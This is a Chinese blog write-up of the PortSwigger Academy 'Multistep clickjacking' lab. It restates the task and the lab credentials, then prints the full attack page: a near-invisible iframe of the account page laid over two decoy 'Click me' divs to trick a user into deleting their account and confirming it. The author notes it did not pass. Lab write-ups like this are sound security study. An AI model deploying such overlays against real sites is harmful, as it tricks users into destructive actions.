Lab: Multistep clickjacking:多点击劫持
靶场内容
这个实验室有一些受CSRF 令牌保护的帐户功能,还有一个确认对话框来防止点击劫持。为了解决这个实验,构建一个攻击,通过点击“首先点击我”和“点击我”诱饵动作来欺骗用户点击删除帐户按钮和确认对话框。您将需要在本实验中使用两个元素。
您可以使用以下凭据自行登录帐户: wiener:peter
漏洞解析
- 这就需要两个点击劫持来完成:一个用于点击,一个用于确认
源代码如下:
<style>
iframe {
position:relative;
width:500;
height: 700;
opacity: 0.0001;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:530;
left:50;
z-index: 1;
}
.secondClick {
top:295;
left:210;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://ac3d1f971eae2e4a800301af00fb00e0.web-security-academy.net/my-account"></iframe>
就不知道为啥不给我过
本文来自博客园,作者:{Zeker62},转载请注明原文链接:https://www.cnblogs.com/Zeker62/p/15179120.html